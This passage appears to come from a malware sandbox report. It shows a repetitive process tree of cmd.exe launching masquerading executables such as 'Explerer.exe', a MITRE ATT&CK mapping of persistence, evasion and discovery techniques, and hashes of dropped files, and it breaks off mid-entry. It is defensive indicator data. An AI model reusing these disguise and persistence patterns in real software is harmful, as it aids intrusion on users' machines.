  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:6988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6568
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8660
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:6408
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:5304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8876
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:3536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6032
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:3888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:4136
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:5584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:3116
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8860
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:1864
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8808
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:2080
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7924
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:5668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6888
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:5580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7688
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:4964
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:3828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:200
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:5048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8864
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8196
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:6016
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:6316
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7708
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:6868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:3784
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:6612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8352
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:4408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:3912
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:892
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:6988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7308
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7436
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8652
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7292
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:9096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7400
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:8228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:5956
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7344
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7552
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:2476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7228
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:3004
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:5644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:5304
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:3536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7644
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:6480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7716
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:4752
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:3116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:3148
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:6272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:1620
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:9104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:5052
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:72

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8464
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:7508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:8388
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:8988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:5652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:3304
- C:\Users\Admin\AppData\Roaming\Explerer.exe
  C:\Users\Admin\AppData\Roaming\Explerer.exe ..
  2⤵
  PID:6964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:6296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7648
- C:\Windows\SysWOW64\Files\fusca%20game.exe
  C:\Windows\SysWOW64\Files\fusca%20game.exe ..
  2⤵
  PID:7728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:2804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:4228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:7368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:7192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Files\fusca%20game.exe" ..
1⤵
PID:4108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Explerer.exe" ..
1⤵
PID:8080

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\INDESK\NewkeyLauncher.exe

Filesize
4.7MB

MD5
13a04bc91f7b2bc4e6078387b70d9c19

SHA1
3c83251c6de566ab4d0d4d34b1fc850d740b43cf

SHA256
72dfb58e4fee383de6ec263501fbcd9592046a5f091a9ddb9b8dd9aabbeeed18

SHA512
c805b2d1cad8cafb85bf100d68b1d419c811fbdddf565959a223148964305a239d80099d7815d978e3ccb43cd03837da70a0cb2254d66a06b809a06232fa6054

Download Submit
C:\INDESK\NewkeyManager.ini

Filesize
4KB

MD5
c598afacca895e2d6afb2a20e7602d18

SHA1
ffd06edb4c1ad606e641fd6f1a4d797dd91a369c

SHA256
647219f4525bd36e9ba966746ebd0395c9af77f2f648ebdf2aab25bc4f37c9fc

SHA512
9f8e3c4c435ba2f55381348bc0807c75adbc7cb0211c5e61b96b36020a73534335b4dd3a8fbfc04dd66948c88603017a40161a43c0f7dd4edfdfb14c15048657

Download Submit
C:\Program Files\Google\Chrome\Application\Chrome_boostrap.exe

Filesize
37KB

MD5
af69d667761ef87674be3d231a0ae0e6

SHA1
a938c72cfd162d097391d3f53f0097fda5a9543f

SHA256
55b2905b08f0715379db90291712363f16a80b3bfb33513012cb9ac7cbff4343

SHA512
32a1994162bb873da35f99816b8740b61e8f9b5a3e22e4aa19704848b4760208f23989f174822669a3105719647c3db9145ae0a227cf41d967d50935da66c4ab

Download Submit
C:\ProgramData\Synaptics\Synaptics.exe

Filesize
764KB

MD5
85e3d4ac5a6ef32fb93764c090ef32b7

SHA1
adedb0aab26d15cf96f66fda8b4cfbbdcc15ef52

SHA256
4e5cc8cb98584335400d00f0a0803c3e0202761f3fbe50bcab3858a80df255e1

SHA512
a7a037bde41bcd425be18a712e27a793185f7fde638e139bbd9d253c371cd9622385eda39cf91ab715ead2591cff5b8c9f5b31d903f138d8af7bab6a9001ccab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\jusched.exe.log

Filesize
1KB

MD5
b4e91d2e5f40d5e2586a86cf3bb4df24

SHA1
31920b3a41aa4400d4a0230a7622848789b38672

SHA256
5d8af3c7519874ed42a0d74ee559ae30d9cc6930aef213079347e2b47092c210

SHA512
968751b79a98961f145de48d425ea820fd1875bae79a725adf35fc8f4706c103ee0c7babd4838166d8a0dda9fbce3728c0265a04c4b37f335ec4eaa110a2b319

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
fa5bc1297e8d76bd37a0a63bbbd70ed2

SHA1
5a2fe5a9d826e1b3d308e82101ddfb5e5d719abf

SHA256
fd6457360464b8c99b4cde26e09a25b1c27adc9b87063734da4206dad7007d22

SHA512
847db0ccfee4266a84e9ea35294350465f04768a81bf2ca9fd641291440d2d7c6e5e0daba9a36988aee0d5b5c931f789899be52b8fb6aa85f07418797859d3f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
53377118a03d7e25bee9d6ed782b656a

SHA1
f9bcc734d2d82a06dabc6848fbbe1681fdddf4f4

SHA256
619cd4fa249f78356cabb9260a94dcd944ae48b0cfbde2689b8f5d1059d6a70d

SHA512
a4584dab0986a5a99e095a47e79f77697b569f0f6af6e34281b487d34103b65e3a632f949f4b34e6a91d2ffd477498887f701cb9a381d9f45da50886311f267f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
f2f33019073483a7e47212dbf85c8981

SHA1
1f8fe34a81935652be75f100069a264abc0907a2

SHA256
7bf0b1a0ac871df9d0e1ee749098f8f108808ee2deeb762c1ce4d71bd09f9a56

SHA512
983ca17653a257a2071c404e66aaadb64da1eedaa61c624ea3b4e122b418427964228e97a179c38555ed493f04bccda5129170f7d2dd005c00fabd6aff379ffb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe58437c.TMP

Filesize
4KB

MD5
c3e2c15b5a11f1f07a6e0b44e2f84cd4

SHA1
5927cd33bb8cedff4d20ef45d597a6bf12ddb28c

SHA256
d54bf8b4e8ce8dca0b386608f03556369aaef0ce14fa8cafd6c1eaca272a4b1e

SHA512
dd21e87c81b403be6049c98e59c85b46d903be6a9b547fbe8b72c0d37bd7d96bd41e28480055a09e0b6839dc119c5aa6fed126db2d26783d4bc7f60f18cbccb1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

Filesize
107KB

MD5
2b66d93c82a06797cdfd9df96a09e74a

SHA1
5f7eb526ee8a0c519b5d86c845fea8afd15b0c28

SHA256
d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954

SHA512
95e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
b50013c0b859156153c66ad6c2fc6aba

SHA1
d7e532ff664bcf2aa2f30f90aeadf4c59d5d48d2

SHA256
8e19a6ab003387221deb1f2453240d686cf064b1aeab1e57cd411f7156876075

SHA512
947ccdb22739753c18c58125904c434a5c594f14313a8ed6e6458cf4416712078c3ac0cab6a2909d941a2c0a6c785cc1f6aa0089bba88f8f54b401a9c2bdd118

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
17KB

MD5
cbed51e72ddfac51e344dbafecd87f2e

SHA1
24ef4ef16e7cd153bd45965de6dd763cde89ad71

SHA256
c4a7427457603c88a2e1da5c64405cc6975bc775cf5579cf149fa11bdf6bab91

SHA512
1312d96fdcc5fa49d5e9a2f8bae38bcc123133f306a38df85354b90c0f53f685c609698331ff344c374f9fcec115867329190e140da660d7cd1195c10008724d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
16KB

MD5
ea417ad4bf6a239e6d98f0535e8d53a8

SHA1
b01b052194271e1029ff13696c82c07bb80fecba

SHA256
144e8e761295378fccd355207b178a26f5944373a40a5de50e01531ab9e515b3

SHA512
a627314bad2823f54118769795d49d31c9a950349595d323876f89571f3189a83d0d8597bc5332e25438083a5cb78f57b18a518e4176c5c7f371f41f7a06fde2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
17KB

MD5
d76bf2e05d779f58dd2075a66d816ded

SHA1
d0405572f724ba7c30372e956aa3e97c56fbabf6

SHA256
5ae0dcab2ce3edc2da229ae9da3f520ee8970a7b9fa2bf00d8814209c6012b3c

SHA512
54a38e39829fbebb1fd9570257e3d6e1db2447584c2c161e83040bf3f0582e63053350ad6d152a20cfdc46dde561a9b63b130126c6ae4a9083caca797b643036

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
37KB

MD5
eb529d8e7aafd8326dcf6ecabc9d75de

SHA1
11c4c08cb341f9beb9653b2de64140a939eac81d

SHA256
75920206ddeb7bd190eb42b96c1bb47c32f0bb178224ff435b79409bab0da0f7

SHA512
dc53310e9ee1e47b5c7a36fa0ff78f2c1e397668115cccaa9917923750e9632c2f0e87205d72a1fb0dbaef4bad687e6f3cdd649d6b240d53a44bc8d08ceb0e61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
168B

MD5
769a8893c45f7dc42b772145d48a2005

SHA1
73b820e557f04d31d6b22f3012db9b6ca3293eaf

SHA256
3ccf752a70bfd45bf9e4585e2599b920d2a562f30ace6eb35ff4172d8a491cd7

SHA512
f82ce25e16ccd72534bf6d85e4de217120d4a99acf6bb169db89aa003172d01ca637290fdb4ed666e91355d57a46e9733f215822bfca122dae571c4b6c3a3132

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58468a.TMP

Filesize
48B

MD5
eba5eb40b04efecd6c48040ddd22502a

SHA1
6132c48796c20d6a88a8f46bc2c77e5113a642fb

SHA256
7187d182109da098ababffa8090cb656dd5daca0b201855da111b34250deb5cb

SHA512
6d8385695a84eb0df138f9dd4d1b737fdb191ad0df6b46bf3a3516e34e3f956a3b8dcac3b7d0eacd72608cc435aa9208f049ff8643a3df6236fc47a4424b8508

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

Filesize
22KB

MD5
36bfef6307d3d9d79326fcd371717e1c

SHA1
5a8310a4b39217a62602797cd36545a0c96a84e1

SHA256
95fa37734a17fd22aa047457813b4e0079306451ccc44a3d7d541d3ada1419ab

SHA512
976d00ccd4fd53622d54e2fae3a13d5b9cafb3f614c6a438e7cd9888461278194662ad6df3eeda953f4b85b97b60f863440dafed3addd378a00b9508a5f9a71e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Filesize
228KB

MD5
838aa92606a615f0758e13785046e429

SHA1
faaf2d308b1853b2e7edd7951b3cbae3861ad6e3

SHA256
5747ad67e5e1d8e86f216b404d52bb07a12cc02934ce8732ecf5a99b6377a993

SHA512
f8933dd7be10c9b4f42ec90b282735e0895733e7953cccf79082c4a77238ea0a7497530bc410c8869ad1929612822054125b53eaf8683e29c0a27c97f841db3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
469B

MD5
ed56c67eb2ec68ee9e54538187c7ad34

SHA1
b24654f4c5381c4989a6826cae7598e78aaffeff

SHA256
8571add30094ba1ad833958f30bc3bfca1af985e37520c6ba4f5d8b027a36711

SHA512
63735a02dd5e137e65093ce0d71e1fe1f441cc1a7c62eead658e6d546299496e9fdbad6d5baf530ac16e47a79d181b1a857100c013cdcd7069d665df1c54fe9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
904B

MD5
1cbf16faf7df1c07bece535818a8e426

SHA1
5cf026b02524cf24fee131840b67c7b161e2c904

SHA256
52bac5342467266a301ea2ff4f3bc93936685292e413a246a9176f87b3a92250

SHA512
c39c1d0af94ee4bfa3d46136b62d28ae684eda106116cbe4c3e6b45e898ed650bdf8bb97147f45324e1aec80ee341d7b8798b5f36562c12d5577fa407eb50a49

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
20KB

MD5
a8084ff649463e95f9fc67e91d786286

SHA1
7603e29796d330a642d0498597db7f7b6589bd29

SHA256
5a05d92810e73b63788fb3c342826340cbb4ab3e719866483c47173dfe001e05

SHA512
292ba542ef0c30b1ce8c4407dee7dcfc31863eb8fd892069714e772c39b84175455685d2612f17817ece90c85e1aacf79606d2d0dd99101a6a7bc7ab41f02282

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig

Filesize
22KB

MD5
3f8927c365639daa9b2c270898e3cf9d

SHA1
c8da31c97c56671c910d28010f754319f1d90fa6

SHA256
fc80d48a732def35ab6168d8fd957a6f13f3c912d7f9baf960c17249e4a9a1f2

SHA512
d75b93f30989428883cb5e76f6125b09f565414cf45d59053527db48c6cf2ac7f54ed9e8f6a713c855cd5d89531145592ef27048cf1c0f63d7434cfb669dbd72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
13B

MD5
3e45022839c8def44fd96e24f29a9f4b

SHA1
c798352b5a0860f8edfd5c1589cf6e5842c5c226

SHA256
